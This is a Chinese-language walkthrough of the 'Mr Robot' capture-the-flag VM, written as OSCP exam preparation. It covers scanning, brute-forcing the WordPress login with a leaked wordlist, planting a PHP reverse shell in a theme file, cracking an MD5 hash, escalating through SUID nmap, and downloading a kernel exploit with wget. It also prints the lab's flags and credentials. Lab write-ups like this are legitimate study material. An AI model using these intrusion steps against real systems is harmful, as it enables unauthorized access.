OSCP备战-mr-robot靶机详细解法
一、靶机描述
难度等级:中等
操作系统类型:Linux
用户::root, robot, daemon
flag目录:在用户家目录中
实验目的
获取三个flag.
二、信息搜集
打开虚拟机:

在打开的时候有显示failed to send command to start host
但是什么都没做,又可以了
开启kali机:
arp-scan -l

得到IP:192.168.155.183
端口扫描:
nmap -p- --min-rate 1000 192.168.155.183

nmap -p22,80,443 -sV -sS -A --min-rate 1000 -T4 192.168.155.183

没什么有用信息,入口好像也就80
三、Getshell
访问80端口显示终端页面:

输入prepare命令,播放了一段视频,给出:whoismrrobot.com

输入其他命令看看:fsociety
Are you ready to join fsociety?
命令:inform,一些新闻看法

命令:question 一些结论性语言
美国梦是一个神话
偷窃即是工作
……
命令:wakeup,视频
命令:join
进入又一个终端

输入了一个邮箱即返回
查看首页源码,没发现什么
进行目录扫描
dirsearch -u http://192.168.155.183 -e *

很多重定向
访问/0,得到页面

搜索页面即进入之前的终端,此时出现参数,改变参数无变化,使用伪协议无变化
Wordpress

需要找到用户密码
再次扫描目录

这很糟糕了
回到80端口看看其他的
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?

I like where you head is at. However I'm not going to help you.

User-agent: *
fsocity.dic
key-1-of-3.txt

访问key-1-of-3.txt获得第一个flag:
073403c8a58a1f80d943455fb30724b9

访问fsocity.dic,得到一个超大字典
那么进行爆破?
下载字典:
wget http://192.168.155.183/fsocity.dic
查看一下,8万多条……
试试去重
sort fsocity.dic | uniq > dic.txt
去重后一万多条
重回wordpress登录页面
Bp抓包爆破
用户名错误是这样的

用户名存在密码错误是这样的


得到用户名ELLOIOT、Elliot、elliot
去爆破密码:
选择集群炸弹攻击,当然这样payload有点多,如果熟悉wordpress登录的代码,可以减轻一点负担。
找到了,可以看提示哈302跳转

密码都是ER28-0652
拿去登录一下

进入后台
找到一个外观-编辑的地方(当然你可以试试插件上传)

应该可以实现反弹shell
查找脚本:
find / -name php-reverse-shell.php

修改脚本:

将脚本复制到外观-edit,404.php页面

启动监听

上传文件,访问文件,提示没找到文件多刷新几遍


四·、旧版本Nmap提权
访问
cat /etc/passwd
cd /home/robot

找到第二个flag,但是没有权限

读取另一个文件

robot:c3fcd3d76192e4007dfb496cca67e13b
MD5解密:
abcdefghijklmnopqrstuvwxyz

创建交互窗口:
python -c "import pty;pty.spawn('/bin/bash')"

获取第二个flag

但是发现权限还是很低
查找一下具有SUID位的文件:
find / -perm -u=s -type f 2>/dev/null

靶机里的nmap

查询一下:


提权成功:

找一下第三个flag:


题外话,试了一下内核提权:
查看内核

searchsploit ubuntu 14.04searchsploit -m 37088.cpython -m http.server 4443wget http://192.168.155.166/37088.c

Gcc编译后启动

失败了,排查了一些
遗憾的是Apport没有运行,后续没有进行了有兴趣的可以试试。
总体来说不难,常规思路解法
考点:了解wordpress/nmap
